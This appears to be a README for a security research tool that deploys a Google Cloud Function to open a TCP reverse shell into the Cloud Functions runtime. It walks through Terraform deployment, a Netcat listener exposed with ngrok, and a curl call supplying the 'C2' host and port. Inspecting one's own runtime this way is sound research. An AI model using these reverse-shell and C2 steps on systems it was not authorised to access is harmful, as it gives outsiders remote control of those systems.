Cheetah is a Go function that can be deployed to the Google Cloud Platform to establish a TCP reverse shell for the purposes of introspecting the Cloud Functions container runtime.
gcloud auth application-default login
export TF_VAR_unique_identifier=$(uuidgen | cut -b 25-36 | awk '{print tolower($0)}')
export TF_VAR_project_id=YOUR_PROJECT_ID
cd ./cheetah/src/terraform/
terraform init
terraform apply --auto-approveRetrieve the Function URL:
export CHEETAH_FUNCTION_URL=$(terraform output --json | jq -r '.cheetah_function_url.value')
export CHEETAH_API_KEY=$(terraform output --json | jq -r '.cheetah_api_key.value')
curl -H "X-API-Key: $CHEETAH_API_KEY" "$CHEETAH_FUNCTION_URL"The result should show an error message indicating required C2 parameters are missing:
{"message":"Must provide the host and port for the target TCP server as query parameters."}If you have Netcat and ngrok installed, you can use this script:
../../../script/prey.sh cheetah --url $CHEETAH_FUNCTION_URL --api-key $CHEETAH_API_KEYSee here for more details on how to use this script.
Alternatively, you can do this manually by setting up a Netcat listener like so:
nc -l 4444Then, to make your listener accessible from the public internet, consider using a service like ngrok:
ngrok tcp 4444Finally, invoke your function, supplying your connection details:
curl "$CHEETAH_FUNCTION_URL?host=YOUR_PUBLICLY_ACCESSIBLE_HOST&port=YOUR_PORT_NUMBER"Your listener will now act as a reverse shell for the duration of the function invocation. You can adjust the function timeout in the serverless.yml file.
terraform destroyRead documentation on what you can accomplish once you connect to the runtime via Cheetah.